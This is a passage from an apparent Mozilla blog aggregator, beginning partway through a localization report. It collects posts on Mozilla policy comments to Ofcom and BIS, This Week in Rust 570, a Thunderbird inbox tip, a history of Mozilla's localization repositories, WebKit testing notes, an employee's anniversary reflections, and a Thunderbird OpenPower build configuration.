You can test this now in version 133 of Nightly by entering about:config in the address bar and pressing enter, proceed past the warning, and search for the following flag: browser.urlbar.scotchBonnet.enableOverride. Toggling the flag to true will enable the feature.

New profile selector

Starting in Version 134 of Nightly a new feature to easily select, create, and change profiles within Firefox will begin rolling out to a small number of users worldwide. Strings are planned to be made available for localization soon.

Sidebar and Vertical Tabs

Finally, as previously mentioned in the previous L10n Report, features for a new sidebar with expanded functionality along with the ability to change your tab layout from horizontal to vertical are available to test in Nightly through the Firefox Labs feature in your settings. Just go to your Nightly settings, select the Firefox Lab section from the left, and enable the feature by clicking the checkbox. Since these are experimental there may continue to be occasional string changes or additions. While you check out these features in your languages, if you have thoughts on the features themselves, we welcome you to share feedback through Mozilla Connect.

What’s new or coming up in web projects

AMO and AMO Frontend

To improve user experience, the AMO team plans to implement changes that will enable only locales meeting a specific completion threshold. Locales with very low completion percentages will be disabled in production but will remain available on Pontoon for teams to continue working on them. The exact details and timeline will be communicated once the plan is finalized.

Mozilla Accounts

Currently Mozilla Accounts is going through a redesign of some of its log-in pages’ user experiences. So we will continue to see small updates here and there for the rest of the year. There is also a planned update to the Mozilla Accounts payment sub platform. We expect to see a new file added to the project before the end of the year – but a large number of the strings will be the same as now. We will be migrating those translations so they don’t need to be translated again, but there will be a number of new strings as well.

Mozilla.org

The Mozilla.org site is undergoing a series of redesigns, starting with updates to the footer and navigation bars. These changes will continue through the rest of the year and beyond. The next update will focus on the About page. Additionally, the team is systematically removing obsolete strings and replacing them with updated or new strings, ensuring you have enough time to catch up while minimizing effort on outdated content.

There are a few new Welcome pages made available to a select few locales. Each of these pages have a different deadline. Make sure to complete them before they are due.

What’s new or coming up in SUMO

The SUMO platform just got a navigation redesign in July to improve navigation for users & contributors. The team also introduced new topics that are standardized across products, which lay the foundation for better data analysis and reporting. Most of the old topics, and their associated articles and questions, have been mapped to the new taxonomy, but a few remain that will be manually mapped to their new topics.

On the community side, we also introduced improvements & fixes on the messaging feature, changing the KB display time in format appropriate to locale, fixed the bug so we can properly display pageviews number in the KB dashboard, and add a spam tag in the list of question if it’s marked as spam to make moderation work easier for the forum moderators.

There will be a community call coming up on Oct 30 at 5pm UTC where we will be talking about Firefox 20th anniversary celebration and Firefox 132 release. Check out the agenda for more detail.

What’s new or coming up in Pontoon

Enhancements to Pontoon Search

We’re excited to announce that Pontoon now allows for more sophisticated searches for strings, thanks to the addition of the new search panel!

When searching for a string, clicking on the magnifying glass icon will open a dropdown, allowing users to select any combination of search options to help refine their search. Please note that the default search behavior has changed, as string identifiers must now be explicitly enabled in search options.

Pontoon Enhanced Search Options

User status banners

As part of the effort to introduce badges/achievements into Pontoon, we’ve added status banners under user avatars in the translation workspace. Status banners reflect the permissions of the user within the respective locale and project, eliminating the need to visit their profile page to view their role.

Namely, team managers will get the ‘MNGR’ tag, translators get the ‘TRNSL’ tag, project managers get the ‘PM’ tag, and those with site-wide admin permissions receive the ‘ADMIN’ tag. Users who have joined within the last three months will get the ‘NEW USER’ tag for their banner. Status banners also appear in comments made under translations.

Screenshot of Pontoon showing the Translate UI, with user displaying the new banner for Manager and AdminNew Pontoon logo

We hope you love the new Pontoon logo as much as we do! Thanks to all of you who expressed your preference by participating in the survey.

Pontoon New Logo

Friends of the Lion

Know someone in your l10n community who’s been doing a great job and should appear here? Contact us and we’ll make sure they get a shout-out!

Useful Links

Questions? Want to get involved?

If you want to get involved, or have any question about l10n, reach out to:

Did you enjoy reading this report? Let us know how we can improve it.

Mozilla Privacy BlogMozilla Participates to Ofcom’s Draft Transparency Reporting Guidance

On 4th October 2024, Mozilla provided our input to Ofcom’s consultation on its draft transparency reporting guidance. Transparency plays a crucial role in promoting accountability and public trust, particularly when it comes to how tech platforms handle harmful or illegal content online and we were pleased to share our research, insight, and input with Ofcom.

Scope of the Consultation

Ofcom’s proposed guidance aims to improve transparency reporting, allowing the public, researchers, and regulators to better understand how categorized services operate and whether they are doing enough to respect users’ rights and protect users from harm.

We support this effort and believe additional clarifications are needed to ensure that Ofcom’s transparency process fully meets its objectives. The following clarifications will ensure that the transparency reporting process effectively holds tech companies accountable, safeguards users, fosters public trust, and allows for effective use of transparency reporting by different stakeholders.

The Importance of Standardization

One of our key recommendations is the need for greater standardization in transparency elements. Mozilla’s research on public ad repositories developed by many of the largest online platforms finds that there are large discrepancies across these transparency tools, making it difficult for researchers and regulators to compare information across platforms.

Ofcom’s guidance must ensure that transparency reports are clear, systematic, and easy to compare year-to-year. We recommend that Ofcom provide explicit guidelines on the specific data platforms must provide in their transparency reports and the formats in which they should be reported. This will enable platforms to comply uniformly and make it easier for regulators and researchers to monitor patterns over time.

In particular, we encourage Ofcom to distinguish between ‘core’ and ‘thematic’ information in transparency reports. We understand that core information will be required consistently every year, while thematic data will focus on specific regulatory priorities, such as emerging areas of concern. However, it is important that platforms are given enough advance notice to prepare their systems for thematic information to avoid any disproportionate compliance burden. This is particularly important for smaller businesses who have limited resources and may find it challenging to comply with new reporting criteria, compared to big tech companies.

We also recommend that data about content engagement and account growth should be considered ‘core’ information that needs to be collected and reported on a regular basis. This data is essential for monitoring civic discourse and election integrity.

Engaging a Broader Range of Stakeholders

Mozilla also believes that a broad range of stakeholders should be involved in shaping and reviewing transparency reporting. Ofcom’s consultative approach with service providers is commendable.  We encourage further expansion of this engagement to include stakeholders such as researchers, civil society organizations, and end-users.

Based on our extensive research, we recommend “transparency delegates.” Transparency delegates are experts who can act as intermediaries between platforms and the public, by using their expertise to evaluate platforms’ transparency in a particular area (for example, AI) and to convey relevant information to a wider audience. This could help ensure that transparency reports are accessible and useful to a range of audiences, from policymakers to everyday users who may not have the technical expertise to interpret complex data.

Enhancing Data Access for Researchers

Transparency reports alone are not enough to ensure accountability. Mozilla emphasizes the importance of giving independent researchers access to platform data. In our view, data access is not just a tool for academic inquiry but a key component of public accountability. Ofcom should explore mechanisms for providing researchers with access to data in a way that protects user privacy while allowing for independent scrutiny of platform practices.

This access is crucial for understanding how content moderation practices affect civic discourse, public safety, and individual rights online. Without it, we risk relying too heavily on self-reported data, which can be inconsistent or incomplete.  Multiple layers of transparency are needed, in order to build trust in the quality of platform transparency disclosures.

Aligning with Other Regulatory Frameworks

Finally, we encourage Ofcom to align its transparency requirements with those set out in other major regulatory frameworks, particularly the EU’s Digital Services Act (DSA). Harmonization will help reduce the compliance burden on platforms and allow users and researchers to compare transparency reports more easily across jurisdictions.

Mozilla looks forward to continuing our work with Ofcom and other stakeholders to create a more transparent and accountable online ecosystem.

 

The post Mozilla Participates to Ofcom’s Draft Transparency Reporting Guidance appeared first on Open Policy & Advocacy.

This Week In RustThis Week in Rust 570

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is trait-gen, an attribute macro to generate the trait implementations for several types without needing custom declarative macros, code repetition, or blanket implementations.

Thanks to Luke Peterson for the suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.
Crates Ecosystem

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

No Calls for papers or presentations were submitted this week.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

464 pull requests were merged in the last week

Rust Compiler Performance Triage

Some tidy improvements from switching to next generation trait solver (solely for coherence checking) and from simplifying our dataflow analysis framework. There were some binary size regressions associated with PR 126557 (adding #[track_caller] to allocating methods of Vec and VecDeque), which I have handed off to T-libs to choose whether to investigate further.

Triage done by @pnkfelix. Revision range: 5ceb623a..3e33bda0

0 Regressions, 3 Improvements, 6 Mixed; 3 of them in rollups 47 artifact comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
Rust Cargo Language Team
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Reference Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2024-10-23 - 2024-11-20 🦀

Virtual
Asia
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

Your problem is that you’re trying to borrow from the dead.

/u/masklinn on /r/rust

Thanks to Maciej Dziardziel for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, andrewpollack, U007D, kolharsam, joelmarcey, mariannegoldin, bennyvasquez.

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

Mozilla ThunderbirdMaximize Your Day: Focus Your Inbox with ‘Grouped by Sort’

For me, staying on top of my inbox has always seemed like an unattainable goal. I’m not an organized person by nature. Periodic and severe email anxiety (thanks, grad school!) often meant my inbox was in the quadruple digits (!).

Lately, something’s shifted. Maybe it’s working here, where people care a lot about making email work for you. These past few months, my inbox has stayed if not manageable, then pretty close to it. I’ve only been here a year, which has made this an easier goal to reach. Treating my email like laundry is definitely helping!

But how do you get a handle on your inbox when it feels out of control? R.L. Dane, one of our fans on Mastodon, reminded us Thunderbird has a powerful, built-in tool than can help: the ‘Grouped by Sort’ feature!

Email Management for All Brains

For those of us who are neurodiverse, email management can be a challenge. Each message that arrives in your inbox, even without a notification ding or popup, is a potential distraction. An email can contain a new task for your already busy to-do list. Or one email can lead you down a rabbit hole while other emails pile up around it. Eventually, those emails we haven’t archived, replied to, or otherwise processed take on a life of their own.

Staring at an overgrown inbox isn’t fun for anyone. It’s especially overwhelming for those of us who struggle with executive function – the skills that help us focus, plan, and organize. A full or overfull inbox doesn’t seem like a hurdle we can overcome. We feel frozen, unsure where to even begin tackling it, and while we’re stuck trying to figure out what to do, new emails keep coming. Avoiding our inboxes entirely starts to seem like the only option – even if this is the most counterproductive thing we can do.

So, how in the world do people like us dig out of our inboxes?

Feature for Focus: Grouped by Sort

We love seeing R.L. Dane’s regular Thunderbird tips, tricks, and hacks for productivity. In fact, he was the one who brought this feature to our attention on a Mastodon post! We were thrilled when we asked if we could turn it to a productivity post and got an excited “Yes!” in response.

As he pointed out, using Grouped by Sort, you can focus on more recently received emails. Sorting by Date, this feature will group your emails into the following collapsible categories:

  • Today
  • Yesterday
  • Last 7 Days
  • Last 14 Days
  • Older

Turning on Grouped by Sort is easy. Click the message list display options, then click ‘Sort by.’ (In the top third, toggle the ‘Date’ option. In the second third, select your preferred order of Descending or Ascending. Finally, in the bottom third, toggle ‘Grouped by Sort.’

Now you’re ready to whittle your way through an overflowing inbox, one group at a time.

And once you get down to a mostly empty and very manageable inbox, you’ll want to find strategies and habits to keep it there. Treating your email like laundry is a great place to start. We’d love to hear your favorite email management habits in the comments!

Resources

ADDitude Magazine: https://www.additudemag.com/addressing-e-mail/

Dixon Life Coaching: https://www.dixonlifecoaching.com/post/why-high-achievers-with-adhd-love-and-hate-their-email-inbox

The post Maximize Your Day: Focus Your Inbox with ‘Grouped by Sort’ appeared first on The Thunderbird Blog.

Mozilla Privacy BlogMozilla Responds to BIS’ Proposed Rule on Reporting Requirements for the Development of Advanced AI Models and Computing Clusters

Lately, we’ve talked a lot about the importance of ensuring that governments take into account open source, especially when it comes to AI. We submitted comments to NIST on Dual-Use Foundation Models and NTIA on the benefits of openness, and advocated in Congress. As frontier models and big tech continue to dominate the policy discussion, we need to ensure that open source remains top of mind for policymakers and regulators. At Mozilla, we know that open source is a fundamental driver of software that benefits people instead of a few big tech corporations, and it helps enable breakthroughs in medicine, science, and allows smaller companies to compete with tech giants. That’s why we’ll continue to raise the voice of the open source community in regulatory circles whenever we can – and most recently, at the Department of Commerce.

Last month, the Bureau of Industry and Security (BIS) released a proposed rule about reporting requirements for developing advanced AI models and computing clusters. This rule stems from the White House’s 2023 Executive Order on AI, which focuses on the safe and trustworthy development of AI. BIS asked for feedback from industry and stakeholders on topics such as the notification schedule for entities covered by the rule, how information is collected and stored, and what thresholds would trigger reporting requirements for these AI models and clusters.

While BIS’ proposed rule seeks to balance national security with economic concerns, it doesn’t adequately take into account the needs of the open source community or provide clarity as to how the proposed rule may affect them. This is critical given some of the most capable and widely used AI models are open source or partially open source. Open source software is a key driver of technological progress in AI and creates tremendous economic and security benefits for the United States. In our full comments, we set out how BIS can further engage with the open-source community and we emphasize the value that open-source offers for both the economy and national security. Below are some key points from our feedback to BIS:

1. BIS should clarify how the proposed rules would apply to open-source projects, especially since many don’t have a specific owner, are distributed globally, and are freely available. Ideally BIS could work with organizations like the Open Source Initiative (OSI) to come up with a framework.

2. As BIS updates the technical conditions for collection thresholds in response to technological advancements, we suggest setting a minimum update cycle of six months. This is crucial given the rapid pace of change in the AI landscape. It’s also necessary to maintain BIS’ core focus on the regulation of frontier models and to not unnecessarily stymie innovation across the broader AI ecosystem.

3. BIS should provide additional clarity about what ‘planned applicable activities’ and when a project is considered ‘planned.’

Mozilla appreciates BIS’s efforts to try and balance the benefits and risks of AI when it comes to national and economic security. We hope that BIS further considers the potential impact of the proposed rule and future regulatory actions on the open source community and appropriately weighs the myriad benefits which open source AI and open source software more broadly produce for America’s national and economic interests. We look forward to providing views as the US Government continues work on these important issues.

The post Mozilla Responds to BIS’ Proposed Rule on Reporting Requirements for the Development of Advanced AI Models and Computing Clusters appeared first on Open Policy & Advocacy.

Francesco LodoloThe (pre)history of Mozilla’s localization repository infrastructure

With many new faces joining Mozilla, as either staff or volunteer localizers, most are only familiar with the current, more streamlined localization infrastructure.

I thought it might be interesting to take a look back at the technical evolution of Mozilla’s localization systems. Having personally navigated every version — first as a community localizer from 2004 to 2013, and later as staff — I’ll share my perspective. That said, I might not have all the details exactly right (or I may have removed some for the sake of my sanity), so feel free to point out any inaccuracies.

Giovanni (center) and I (left) from Mozilla Italia at a booth to promote Firefox, back in 2007. Probably one of the older photos I have around.<figcaption class="wp-element-caption">Attending one of the earliest events organized by the Italian Community (2007)</figcaption>

Early days: Centralized version control

Back in the early 2000s, smartphones weren’t a thing, Windows XP was an acceptable operating system — especially in comparison to Windows Me — and distributed version controls weren’t as common. Let’s be honest, centralized version controls were not fun: every commit meant interacting directly with the server. You had to remember to update your local copy, commit your changes, and then hope no one else had committed in the meantime — otherwise, you were stuck resolving conflicts.

Given the high technical barriers, localizers at that time were primarily technical users, not discouraged by crappy text editors — encoding issues, BOMs, and other amenities — and command line tools.

To make things more complicated, localizers had to deal with 2 different systems:

  • CVS (Concurrent Versioning System) was used for products like Mozilla Suite, Phoenix/Firefox, etc. To increase confusion, it used branch names that followed the Gecko versions (e.g. MOZILLA_1_8_BRANCH), and those didn’t map at all to product versions. Truth be told, the whole release cadence and cycle felt like complete chaos back then, at least as a volunteer.
  • SVN (Subversion) was used to localize mozilla.org, addons.mozilla.org (AMO), and other web projects.

With time, desktop and web-based applications emerged to support localizers, hiding some of the complexity of version control systems and providing translation management features:

  • Mozilla Translator (a local Java application. Yes kids, Java).
  • Narro.
  • Pootle.
  • Verbatim: a customized Pootle instance run by Mozilla, used to localize web projects like addons.mozilla.org. This was shut down in 2015 and projects transitioned to Pontoon.
  • Pontoon (here’s the first idea and repository, if you’re curious).
  • Aisle, an internal experiment based on C9 that never got past the initial tests.

This proliferation of new tools led to a couple of key principles that are still valid to this day:

  • The repository, not the TMS (Translation Management System), is the source of truth.
  • TMSs need to support bidirectional synchronization between their internal data storage and the repository, i.e. they need to read updated translated content from the repository and store it internally (establishing a conflict resolution policy), not just write updates.

This might look trivial, but it’s an outlier in the localization industry, where the tool is the source of truth, and synchronization only happens in one direction (from the TMS to the repository).

The shift to Mercurial

At the end of 2007, Mozilla made the decision to transition from CVS to Mercurial, this time opting for a distributed version control system. For localization, this meant making the move to Mercurial as well, though it took a few more months of work. This marked the beginning of a new era where the infrastructure quickly started becoming more complex.

As code development was happening in mozilla-central, localization was supposed to be stored in a matching l10n-central repository. But here’s the catch: instead of one repository, the decision was to use one repository per locale, each one including the localization for all shipping projects (Firefox, Firefox for Android, etc.). I’m not sure how many repositories that meant at the time — based on the dependencies of this bug, probably around 30 — but as of today, there are 156 l10n-central repositories, while Firefox Nightly only ships in 111 locales (a few of them added recently).

The next massive change was the adoption of the rapid release cycle in 2011:

  • 3 new sets of repositories had to be created for the corresponding Firefox versions: l10n/mozilla-aurora, l10n/mozilla-beta, l10n/mozilla-release.
  • Localizers working against Nightly in l10n-central would need to manually move their updates to l10n/mozilla-aurora, which was becoming the main target for localization.
  • At the end of the cycle (“merge day”), someone in the localization team would manually move content from Aurora to Beta, overwriting any changes.
  • In order to allow localizers to make small fixes to Beta, 2 separate projects were set up in Pontoon (one working against Aurora, one against Beta), and it was up to localizers to keep them in sync, given that content in Beta would be overwritten on merge day.

If you’re still trying to keep count, we’re now at about 600 Mercurial repositories to localize a project like Firefox (and a few hundreds more added later for Firefox OS, one for each locale and version, but that’s a whole different story).

I won’t go into the fine details, but at this point localizers were also supposed to “sign off” on the version of their localization that they wanted to ship. Over time, this was done by:

  • Calling out which changeset you wanted to ship in an email thread.
  • Later, requesting sign-off in a web app called Elmo (because it was hosted on l10n.mozilla.org, (e)l.m.o., got it?). Someone in the localization team had to manually go through each request, check the diff from the previous sign-off to ensure that it would not break Firefox, and either accept or reject it. For context, at the time DTDs were still heavily in use for localization, and a broken translation could easily brick the browser (yellow screen of death). 
  • With the drop of Aurora in 2017, the localization team started reviewing and managing sign-offs in Elmo without waiting for localizers to make a request. Yay for localizers, one less thing to do.
  • In 2020, partly because of the lay-offs that impacted the team, we completely dropped the sign-off process and decommissioned Elmo, automatically taking the latest changeset in each l10n repository.
Sad Elmo sitting on a park bench, in a gloomy weather, with rain puddles on the street.

The new kid on the block: GitHub

In 2015 we started migrating repositories from SVN to GitHub. At the time, that meant mostly web projects, managed by Pascal Chevrel and me, with the notable exception of Firefox for iOS. That part of localization had a whole infrastructure of its own: a web dashboard to track progress, a tool called langchecker to update files and identify errors, and even a file format called dotlang (.lang) that was used for a while to localize mozilla.org (we switched to Fluent in 2019).

The move to GitHub removed a lot of bureaucracy, as the team could create new repositories and grant access to localizers without going through an external team, like it was the case for Mercurial. Still today, GitHub is the go-to choice for new projects, although the introduction of SAML single sign-on created a significant hurdle when it comes to add external contributors to a project.

Introduction of cross-channel for Firefox

Remember the 600 repositories? Still there… Also, the most observant among you might wonder: didn’t Mozilla had another version of Firefox (Extended Support Release, or ESR)? You’re correct, but the compromise there was that ESR would be string-frozen, so we didn’t need another ~150 repositories: we used the content from mozilla-release at the time of launch, and that’s it, no more updates.

In 2017, the Aurora channel was “removed”, leaving Nightly (based on mozilla-central), Developer Edition and Beta (based on mozilla-beta), Release (based on mozilla-release) and ESR. I use quotes, because “aurora” is still technically the internal channel name for Dev Edition.

That was a challenge, as Aurora represented the main target for localization. That change forced us to move all locales to work on Nightly around April 2017. 

Later in the year, Axel Hecht came up with a core concept that still supports how we localize Firefox nowadays: cross-channel. What if, instead of having to extract strings from 4 huge code repositories, we create a tool that generates a superset of the strings shipping in all supported versions (channels) of Firefox, and put them in a nimble, string-only repository? That’s exactly what cross-channel did, allowing us to drop ~300 repositories (plus ~150 already dropped because of the removal of Aurora). It also gave us the opportunity to support localization updates in release and ESR. At this point, localization for any shipping version of Firefox comes out of a single repository for each locale (e.g. l10n-central/fr for French).

Chart representing the flow in the build system with cross-channel.<figcaption class="wp-element-caption">Code repositories are used to generate cross-channel content, which in turn is used to feed Pontoon, storing translations in l10n-central repositories. From the chart, it’s also visible how English (en-US) is treated as a special case, going directly from code repositories to the build system.</figcaption>

In hindsight, cross-channel was overly complex: it would not only create the superset content, but it would also replay the Mercurial history of the commit introducing the change. The content would land in the cross-channel repository with a reference to the original changeset (example), making it possible to annotate the file via Mercurial’s web interface. In order to do that, the code hooked directly into Mercurial internals, and it would break frequently thanks to the complexity of Mozilla’s repositories. In 2021 the code was changed to stop replaying history and only merging content.

At this point, in late 2017, Firefox localization relied on ~150 l10n repositories, and 2 source repositories for cross-channel — one used as a quarantine, the other, called gecko-strings, connected to Pontoon to expose strings for community localization.

Current Firefox infrastructure

Fast-forward to 2024, with Mozilla’s decision to move development to Git, we had an opportunity to simplify things even further, and rethink some of the initial choices:

Thunderbird has adopted a similar structure, with their own 3 repositories.

The team completed the migration to Git in June, ahead of the rest of the organization, and all current versions of Firefox ship from the firefox-l10n repository (including ESR 115 and ESR 128).

Visual timeline of changes described in the article, from CSV to Git.

Conclusions

So, this was the not-so-short story of how Mozilla’s localization infrastructure has evolved over time, with a focus on Firefox. Looking back, it’s remarkable to see how far we’ve come. Today, we’re in a much better place, also considering the constant effort to improve Pontoon and other tools used by the community.

As I approach one of my many anniversaries — I have one for when I started as a volunteer (January 2004), when I became a member of staff as a contractor (April 2013), one “official” when I became an employee (November 2018) — it’s humbling to think about what a small team has accomplished over the past 22 years. These milestones remind me of the incredible contributions of so many brilliant individuals at Mozilla, whose passion helped build the foundations we stand on today.

It’s also bittersweet to go back and read emails from over 15 years ago, remembering just how pivotal the community was in shaping Firefox into what it is today. The dedication of volunteers and localizers helped make Firefox a truly global browser, and their impact is still felt — and sometimes missed — today.

Picture of Mozilla L10n folks at the first Mozilla Summit (Whistler, 2008), back when Mozilla was still inviting volunteers to Company events.<figcaption class="wp-element-caption">Mozilla L10n Community in Whistler, 2008 (Photo by Tristan Nitot)</figcaption>

Anne van KesterenWebKit and web-platform-tests

Let me state upfront that this strategy of keeping WebKit synchronized with parts of web-platform-tests has worked quite well for me, but I’m not at all an expert in this area so you might want to take advice from someone else.

Once I've identified what tests will be impacted by my changes to WebKit, including what additional coverage might be needed, I create a branch in my local web-platform-tests checkout to make the necessary changes to increase coverage. I try to be a little careful here so it'll result in a nice pull request against web-platform-tests later. I’ve been a web-platform-tests contributor quite a while longer than I’ve been a WebKit contributor so perhaps it’s not surprising that my approach to test development starts with web-platform-tests.

I then run import-w3c-tests web-platform-tests/[testsDir] -s [wptParentDir] on the WebKit side to ensure it has the latest tests, including any changes I made. And then I usually run them and revise, as needed.

This has worked surprisingly well for a number of changes I made to date and hasn’t let me down. Two things to be mindful of:

  • On macOS, don’t put development work, especially WebKit, inside ~/Documents. You might not have a good time.
  • [wptParentDir] above needs to contain a directory named web-platform-tests, not wpt. This is annoyingly different from the default you get when cloning web-platform-tests (the repository was renamed to wpt at some point). Perhaps something to address in import-w3c-tests.

Chris H-CNine-Year Moziversary

On this day (or near it) in 2015, I joined the Mozilla project by starting work as a full-time employee of Mozilla Corporation. I’m two hardware refreshes in (I was bad for doing them on time, leaving my 2017 refresh until 2018 and my 2020 refresh until 2022! (though, admittedly, the 2020 refresh was actually pushed to the end of 2021 by a policy change in early 2020 moving from 2-year to 3-year refreshes)) and facing a third in February. Organizationally, I’m three CEOs and sixty reorgs in.

I’m still working on Data, same as last year. And I’m still trying to move Firefox Desktop to use solely Glean for its data collection system. Some of my predictions from last year’s moziversary post came true: I continued working on client code in Firefox Desktop, I hardly blogged at all, we continue to support collections in all of Legacy Telemetry’s systems (though we’ve excitingly just removed some big APIs), Glean has continued to gain ground in Firefox Desktop (we’re up to 4134 metrics at time of writing), and “FOG Migration” has continued to not happen (I suppose it was one missed prediction that top-down guidance would change — it hasn’t, but interpretations of it sure have), and I’m publishing this moziversary blog post a little ahead of my moziversary instead of after it.

My biggest missed prediction was “We will quietly stop talking about AI so much, in the same way most firms have stopped talking about Web3 this year”. Mozilla, both Corporation and Foundation, seem unable to stop talking about AI (a phrase here meaning “large generative models built on extractive data mining which use chatbot UI”). Which, I mean, fair: it’s consuming basically all the oxygen and money in the industry at the moment. We have to have a position on it, and it’s appropriating “Open” language that Mozilla has a vested interest in protecting (though you’d be excused for forgetting that given how little we’ve tried to work with the FSF and assorted other orgs trying to shepherd the ideas and values of Open Source in the recent past). But we’ve for some reason been building products around these chatbots without interrogating whether that’s a good thing.

And you’d think with all our worry about what a definition of Open Source might mean, we’d make certain to only release products that are Open Source. But no.

I understand why we’re diving into products and trying to release innovative things in product shape… but Mozilla is famously terrible at building products. We’re okay at building services (I’m a fan of both Monitor and Relay). But where we seem to truly excel is in building platforms and infrastructure.

We build Firefox, the only independent browser, a train that runs on the rails of the Web. We build Common Voice, a community and platform for getting underserved languages (where which languages are used is determined by the community) the support they need. We built Rust, a memory-safe systems language that is now succeeding without Mozilla’s help. We built Hubs, a platform for bringing people together in virtual space with nothing but a web browser.

We’re just so much better at platforms and infrastructure. Why we don’t lean more into that, I don’t know.

Well, I _do_ know. Or I can guess. Our golden goose might be cooked.

How can Mozilla make money if our search deal becomes illegal? Maintaining a browser is expensive. Hosting services is expensive. Keeping the tech giants on their toes and compelling them to be better is expensive. We need money, and we’ve learned that there is no world where donations will be enough to fund even just the necessary work let alone any innovations we might try.

How do you monetize a platform? How do you monetize infrastructure?

Governments do it through taxation and funding. But Mozilla Corporation isn’t a government agency. It’s a conventional Silicon Valley private capital corporation (its relationship to Mozilla Foundation is unconventional, true, but I argue that’s irrelevant to how MoCo organizes itself these days). And the only process by which Silicon Valley seems to understand how to extract money to pay off their venture capitalists is products and consumers.

Now, Mozilla Corporation doesn’t have venture capital. You can read in the State of Mozilla that we operate at a profit each and every year with net assets valued at over a billion USD. But the environment in which MoCo operates — the place from which we hire our C-Suite, the place where the people writing the checks live — is saturated in venture capital and the ways of thinking it encourages.

This means Mozilla Corporation acts like its Bay Area peers, even though it’s special. Even though it doesn’t have to.

This means it does layoffs even when it doesn’t need to. Even when there’s no shareholders or fund managers to impress.

This means it increasingly speaks in terms of products and customers instead of projects and users.

This means it quickly loses sight of anything specifically Mozilla-ish about Mozilla (like the community that underpins specific systems crucial to us continuing to exist (support and l10n for two examples) as well as the general systems of word-of-mouth and keeping Mozilla and Firefox relevant enough that tech press keep writing about us and grandpas keep installing us) because it doesn’t fit the patterns of thought that developed while directing leveraged capital.

(( Which I don’t like, if my tone isn’t coming across clearly enough for you to have guessed. ))

Okay, that’s more than enough editorial for a Moziversary post. Let’s get to the predictions for the next year:

  • I still won’t blog as much as I’d like,
  • “FOG Migration” might actually happen! We’ve finally managed to convince Firefox folks just how great Glean is and they might actually commit official resources! I predict that we’re still sending Legacy Telemetry by the end of next year, but only bits and pieces. A weak shadow of what we send today.
  • There’ll be an All Hands, but depending on the result of the US federal election in November I might not attend because its location has been announced as Washington DC and I don’t know if the United States will be in a state next year to be trusted to keep me safe,
  • We will stop putting AI in everything and hoping to accidentally make a product that’ll somehow make money and instead focus on finding problems Mozilla can solve and only then interrogating whether AI will help
  • The search for the new CEO will not have completed by next October so I’ll still be three CEOs in, instead of four
  • I will execute on my hardware refresh on time this February, and maybe also get a new monitor so I’m not using my personal one for work.

Let’s see how it goes! Til next time.

:chutten

The Talospace ProjectRunning Thunderbird with the OpenPower Baseline JIT

The issues with Ion and Wasm in OpenPower Firefox notwithstanding, the Baseline JIT works well in Firefox ESR128, and many of you use it (including yours truly). Of course, that makes Thunderbird look sluggish without it.

I wasn't able to get a full LTO-PGO build for Thunderbird to build properly so far with gcc (workin' on it), but with the JIT patches for ESR128 an LTO optimized build will complete and run, and that's good enough for now. The diff for the .mozconfig is more or less the following:

export CC=/usr/bin/gcc
export CXX=/usr/bin/g++

mk_add_options MOZ_MAKE_FLAGS="-j24"

#ac_add_options --enable-application=browser
#ac_add_options MOZ_PGO=1
#
ac_add_options --enable-project=comm/mail
mk_add_options MOZ_OBJDIR=@TOPSRCDIR@/tbobj

ac_add_options --enable-optimize="-O3 -mcpu=power9 -fpermissive"
ac_add_options --enable-release
ac_add_options --enable-linker=bfd
ac_add_options --enable-lto=full
ac_add_options --without-wasm-sandboxed-libraries
ac_add_options --with-libclang-path=/usr/lib64

export GN=/home/censored/bin/gn # if you haz
export RUSTC_OPT_LEVEL=2

You can use a unified .mozconfig like this to handle both the browser and the E-mail client; if you do, to build the browser the commented lines should be uncommented and the two lines below the previously commented section should be commented.

You'll need comm-central embedded in your ESR128 tree as per the build instructions, and you may want to create an .hg/hgignore file inside your ESR128 source directory as well to keep changes to the core and Tbird from clashing, something like

^tbobj/
^comm/

which will ignore those directories but isn't a change to .hgignore that you have to manually edit out. Once constructed, your built client will be in tbobj/. If you were using a prebuilt Thunderbird before, you may need to start it with tbobj/dist/bin/thunderbird -p default-release (substitute your profile name if it differs) to make sure you get your old mailbox back, though as always backup your profile first.

Firefox Add-on ReviewsYouTube your way — browser extensions put you in charge of your video experience

